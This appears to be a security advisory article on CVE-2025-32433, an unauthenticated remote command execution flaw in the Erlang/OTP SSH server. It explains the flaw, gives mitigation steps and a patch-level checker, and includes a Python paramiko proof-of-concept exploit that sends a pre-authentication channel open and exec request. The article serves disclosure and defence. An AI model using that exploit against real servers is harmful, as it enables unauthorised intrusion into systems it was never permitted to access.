The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-32433, a critical flaw in the Erlang/OTP SSH server, to its Known Exploited Vulnerabilities (KEV) catalog.
The vulnerability allows unauthenticated remote code execution (RCE): the server carries out a critical function without first checking that the client has authenticated, so an attacker who can reach the SSH port needs no valid credentials.
The KEV entry directs organizations to apply mitigations per vendor instructions, follow the applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if no mitigation is available.
Description:
CVE-2025-32433 arises from a flaw in how the Erlang/OTP SSH server handles the ordering of SSH protocol messages.
An SSH server should complete the authentication protocol (RFC 4252) before it accepts any connection-protocol message (RFC 4254) such as a channel open or an exec request. The vulnerable server processes those messages even when authentication has not completed, so an attacker can have arbitrary commands executed with the privileges of the SSH daemon process, which in many deployments runs as root.
The impact could be severe, as Erlang/OTP's SSH server ships in a wide array of products, including those from Cisco, NetApp, and SUSE.
Vulnerability Classification:
Common Weakness Enumeration (CWE): CWE-306 — Missing Authentication for Critical Function
Affected Software and Environments:
Exploitation Scenario:
An attacker with network access to the SSH port completes the normal banner exchange and key exchange and then, instead of authenticating, sends connection-protocol messages: a channel open followed by a channel request such as "exec" carrying a command. The vulnerable server processes these messages without verifying that authentication has succeeded, so the command runs with the privileges of the SSH daemon process. No credentials, user interaction, or prior foothold are required.
Code Example (Pseudo-Erlang, illustrative sketch of the flaw):
```erlang
%% Simplified, hypothetical sketch of the vulnerable dispatch; not the real
%% Erlang/OTP ssh code. The defect is that a connection-protocol message is
%% acted on without first checking that user authentication has completed.
handle_msg(#ssh_msg_channel_request{request_type = "exec", data = Cmd}, State) ->
    %% Missing check: State#state.authenticated should be true before this runs
    run_command(Cmd, State);  % <-- the flaw: exec handled pre-auth
handle_msg(_Other, State) ->
    {noreply, State}.
```
Note: the above is a simplified, illustrative sketch, not Erlang/OTP's own code. The real flaw sits in the lower-level handling of SSH connection-protocol messages, which the server acted on before the authentication exchange had finished.
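To make the CWE-306 pattern concrete, here is an added Python model of a server-side SSH message dispatcher; it is example code written for this article, not Erlang/OTP's implementation. The message numbers are the RFC 4253/4252/4254 values, while the `Session` class, the handlers, the password check and the message sequences are constructed for the demonstration. `dispatch_vulnerable` routes purely by message number and never consults authentication state, so a channel open and exec request sent before any userauth exchange are carried out; `dispatch_hardened` gates every connection-protocol message (numbers 80 to 127) on `authenticated` and terminates the session when one arrives early.

```python
# Added example (not code from the article or from Erlang/OTP): a toy model of
# a server-side SSH message dispatcher, contrasting the CWE-306 pattern behind
# CVE-2025-32433 with the state check that closes the hole. Message numbers are
# the RFC 4253/4252/4254 values; everything else here is constructed.

SSH_MSG_SERVICE_REQUEST = 5
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98

# RFC 4254 connection-protocol messages occupy message numbers 80-127.
CONNECTION_MSG_RANGE = range(80, 128)


class Session:
    """Per-connection state; `executed` records commands the server ran."""

    def __init__(self):
        self.authenticated = False
        self.channels = set()
        self.executed = []
        self.disconnected = False


def _handle_connection_msg(sess, msg_type, payload):
    """Connection-protocol handling shared by both dispatchers."""
    if msg_type == SSH_MSG_CHANNEL_OPEN:
        sess.channels.add(payload["channel"])
    elif msg_type == SSH_MSG_CHANNEL_REQUEST:
        if payload["channel"] in sess.channels and payload["request"] == "exec":
            sess.executed.append(payload["command"])  # stands in for running the command


def _handle_userauth(sess, payload):
    # Constructed credential check; a real server verifies keys or passwords properly.
    if payload.get("password") == "correct-horse":
        sess.authenticated = True


def dispatch_vulnerable(sess, msg_type, payload):
    """CWE-306 pattern: routes by message number only and never consults
    sess.authenticated, so pre-auth CHANNEL_OPEN/CHANNEL_REQUEST are honoured."""
    if msg_type == SSH_MSG_USERAUTH_REQUEST:
        _handle_userauth(sess, payload)
    elif msg_type in CONNECTION_MSG_RANGE:
        _handle_connection_msg(sess, msg_type, payload)


def dispatch_hardened(sess, msg_type, payload):
    """Same routing, but every connection-protocol message is gated on
    authentication state; a pre-auth one terminates the session."""
    if msg_type in CONNECTION_MSG_RANGE and not sess.authenticated:
        sess.disconnected = True
        return
    if sess.disconnected:
        return
    if msg_type == SSH_MSG_USERAUTH_REQUEST:
        _handle_userauth(sess, payload)
    elif msg_type in CONNECTION_MSG_RANGE:
        _handle_connection_msg(sess, msg_type, payload)


def run(dispatcher, messages):
    """Feed a message sequence through a dispatcher and return the final state."""
    sess = Session()
    for msg_type, payload in messages:
        dispatcher(sess, msg_type, payload)
    return sess


# Constructed attacker sequence: key exchange is assumed done, no USERAUTH_REQUEST
# is ever sent, yet a channel is opened and an exec request follows.
PRE_AUTH_EXEC = [
    (SSH_MSG_SERVICE_REQUEST, {"service": "ssh-userauth"}),
    (SSH_MSG_CHANNEL_OPEN, {"channel": 0}),
    (SSH_MSG_CHANNEL_REQUEST, {"channel": 0, "request": "exec", "command": "id"}),
]

# Constructed legitimate sequence: authenticates first, then opens a channel and execs.
AUTHENTICATED_EXEC = [
    (SSH_MSG_SERVICE_REQUEST, {"service": "ssh-userauth"}),
    (SSH_MSG_USERAUTH_REQUEST, {"username": "ops", "password": "correct-horse"}),
    (SSH_MSG_CHANNEL_OPEN, {"channel": 0}),
    (SSH_MSG_CHANNEL_REQUEST, {"channel": 0, "request": "exec", "command": "id"}),
]

if __name__ == "__main__":
    v = run(dispatch_vulnerable, PRE_AUTH_EXEC)
    h = run(dispatch_hardened, PRE_AUTH_EXEC)
    ok = run(dispatch_hardened, AUTHENTICATED_EXEC)
    print("vulnerable, pre-auth:", v.executed, "authenticated =", v.authenticated)
    print("hardened, pre-auth:", h.executed, "disconnected =", h.disconnected)
    print("hardened, authenticated:", ok.executed)
```

Running the module shows the vulnerable dispatcher executing `id` while `authenticated` is still `False`, the hardened dispatcher executing nothing and disconnecting, and the authenticated sequence still executing under the hardened dispatcher, so the extra check costs legitimate clients nothing.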
Example Exploit (Python, illustrative only):
```python
import paramiko

# Illustrative only: sends the connection-protocol messages that CVE-2025-32433
# fails to reject, without ever authenticating. paramiko's SSHClient cannot be
# used for this, because connect() completes authentication before
# exec_command(); the lower-level Transport lets the userauth step be skipped.
# Whether the vulnerable daemon accepts the messages exactly as paramiko frames
# them is not verified here.
t = None
try:
    t = paramiko.Transport(('vulnerable.host', 22))
    t.start_client()          # banner and key exchange only; no auth_password/auth_publickey call
    chan = t.open_session()   # SSH_MSG_CHANNEL_OPEN "session" sent before authentication
    chan.exec_command('id')   # SSH_MSG_CHANNEL_REQUEST "exec" sent before authentication
    print(chan.recv(4096).decode(errors='replace'))
except (paramiko.SSHException, OSError) as e:
    print('Request rejected or connection closed (server patched or not vulnerable):', e)
finally:
    if t is not None:
        t.close()
```
The snippet mirrors the flaw rather than proving it: a patched server, or any server that correctly rejects connection-protocol messages before authentication, closes the connection as soon as the pre-auth channel open arrives, so the command only runs where the ordering check is missing, as in CVE-2025-32433.
CISA’s KEV Catalog and Prioritization:
CISA emphasizes the importance of using the KEV catalog as a key input for vulnerability management frameworks. The catalog now includes CVE-2025-32433; Federal Civilian Executive Branch agencies are required under BOD 22-01 to remediate it by the stated due date (2025-06-30), and CISA strongly urges all other organizations to prioritize timely remediation of catalog entries as well.
Mitigation Steps:
Upgrade to a fixed Erlang/OTP release as listed in the upstream advisory for CVE-2025-32433, or to the vendor-supplied patched build for products that embed Erlang/OTP. Where an upgrade cannot be applied promptly, disable the Erlang/OTP SSH daemon or restrict reachability of its listening port with firewall rules to trusted sources only. Per the KEV required action, organizations that cannot mitigate should discontinue use of the product.
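A first triage step is to find which OTP patch level a host runs and compare it with the fix on that host's own branch. The helper below is an added example written for this article, not the page's or the Erlang project's code. The entries in `FIXED_VERSIONS` are the first fixed releases given in the upstream Erlang/OTP advisory for CVE-2025-32433 and should be re-checked against that advisory before use; the `releases/<major>/OTP_VERSION` file layout is the standard OTP install layout, and the version strings in `__main__` are constructed samples. The comparison is branch-aware: a 26.x host is measured against the 26 fix rather than the 27 one, a major with no fix (24 and older, which are end-of-life) is reported as unpatched, and a major newer than any fixed branch is treated as released after the fix (an assumption, labelled in the code).

```python
# Added example (not from the article or the Erlang/OTP project): decide whether
# an installed Erlang/OTP patch level is fixed for CVE-2025-32433.
from pathlib import Path

# First fixed release on each maintained branch, per the upstream Erlang/OTP
# advisory for CVE-2025-32433. Re-verify against the advisory before relying on it.
FIXED_VERSIONS = {
    27: (27, 3, 3),
    26: (26, 2, 5, 11),
    25: (25, 3, 2, 20),
}


def parse_otp_version(text):
    """Turn 'OTP-26.2.5.10' or '26.2.5.10' into a comparable tuple (26, 2, 5, 10)."""
    text = text.strip()
    if text.upper().startswith("OTP-"):
        text = text[4:]
    return tuple(int(part) for part in text.split("."))


def is_patched(version):
    """Branch-aware check: compare only against the fix on the host's own major.

    Returns False for majors that never received a fix (24.x and older are
    end-of-life), True for majors newer than any fixed branch (assumption:
    those releases were cut after the fix landed), and otherwise a plain
    tuple compare, which handles both shorter strings ('27.3' < '27.3.3')
    and longer ones ('26.2.6' > '26.2.5.11').
    """
    parsed = parse_otp_version(version)
    major = parsed[0]
    if major > max(FIXED_VERSIONS):
        return True
    fixed = FIXED_VERSIONS.get(major)
    if fixed is None:
        return False
    return parsed >= fixed


def installed_versions(otp_root):
    """Read every releases/<major>/OTP_VERSION under an OTP install root
    (standard layout; otp_root is something like /usr/lib/erlang).
    Returns {version_string: patched_bool}."""
    result = {}
    for vfile in Path(otp_root).glob("releases/*/OTP_VERSION"):
        version = vfile.read_text().strip()
        result[version] = is_patched(version)
    return result


if __name__ == "__main__":
    # Constructed sample inputs; on a real host call installed_versions("/usr/lib/erlang").
    for sample in ["OTP-26.2.5.10", "26.2.5.11", "27.3.2", "27.3.3",
                   "25.3.2.19", "24.3.4.17", "28.0"]:
        print(f"{sample:>14}: {'patched' if is_patched(sample) else 'UNPATCHED'}")
```

Vendor appliances that embed Erlang/OTP often do not expose this file or let you run `erl`; for those, rely on the vendor's own advisory and patched build rather than on the OTP version number.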
Current Threat Landscape:
At this time, it is not publicly known whether CVE-2025-32433 has been exploited in ransomware campaigns. However, the risk of exploitation is considered high due to the potential for unauthenticated RCE.
The rapid addition of CVE-2025-32433 to CISA’s KEV catalog underscores the critical nature of this vulnerability and the urgency for organizations to defend against potential exploitation.
Network defenders should immediately consult the KEV catalog, apply available mitigations, and monitor for signs of exploitation. Prioritizing the remediation of this flaw is essential for maintaining robust cybersecurity postures in an increasingly hostile threat environment.